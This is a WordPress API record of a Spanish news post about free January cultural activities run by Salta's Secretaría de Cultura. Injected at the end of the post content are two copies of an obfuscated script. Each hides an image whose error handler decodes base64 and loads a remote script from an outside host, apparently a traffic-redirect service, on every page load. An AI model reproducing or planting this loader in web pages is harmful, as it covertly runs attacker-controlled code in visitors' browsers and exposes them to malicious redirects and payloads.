{"id":3463,"date":"2024-01-02T17:46:11","date_gmt":"2024-01-02T20:46:11","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3463"},"modified":"2025-08-14T00:02:57","modified_gmt":"2025-08-14T03:02:57","slug":"vacaciones-en-cultura-manana-3-de-enero-presentaran-el-calendario-de-actividades-para-disfrutar-en-familia","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3463","title":{"rendered":"Vacaciones en Cultura: ma\u00f1ana 3 de enero presentar\u00e1n el calendario de actividades para disfrutar en familia"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#900542\"><strong><em>Talleres, juegos, espect\u00e1culos de m\u00fasica, danzas y mucho m\u00e1s son las propuestas que durante todo el mes de enero sin l\u00edmite de edad en los diferentes espacios de la Secretar\u00eda de Cultura de la Provincia.<\/em><\/strong><\/h3>\n\n\n\n<p>Desde la primera semana del 2024 hasta el mes de febrero, en Salta se vivir\u00e1 la Cultura y el Arte en todos sus espacios. Las actividades contar\u00e1n con entrada libre y gratuita para todos los gustos y edades.<\/p>\n\n\n\n<p>Ma\u00f1ana&nbsp;mi\u00e9rcoles 3 de enero se dar\u00e1 a conocer el cronograma en Casa de la Cultura, Caseros 460, a partir de las 11 junto a funcionarios, artistas e invitados especiales.<\/p>\n\n\n\n<p>Las propuestas culturales en toda la provincia comprenden espect\u00e1culos de m\u00fasica y danza, actividades l\u00fadicas y de literatura juvenil, talleres para experimentar con el arte y dejar volar la imaginaci\u00f3n, hip hop, visitas guiadas durante enero y febrero.<\/p>\n\n\n\n<p>M\u00e1s informaci\u00f3n en: www.culturasalta.gov.ar<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><em><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/vacaciones-en-cultura-maniana-3-de-enero-presentaran-el-calendario-de-actividades-para-disfrutar-en-familia-93590\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/em><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Talleres, juegos, espect\u00e1culos de m\u00fasica, danzas y mucho m\u00e1s son las propuestas que durante todo el mes de enero sin l\u00edmite de edad en los diferentes espacios de la Secretar\u00eda de Cultura de la Provincia. Desde la primera semana del 2024 hasta el mes de febrero, en Salta se vivir\u00e1 la Cultura y el Arte [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3464,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-3463","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3463"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3463"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3463\/revisions"}],"predecessor-version":[{"id":6885,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3463\/revisions\/6885"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3464"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3463"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3463"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3463"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}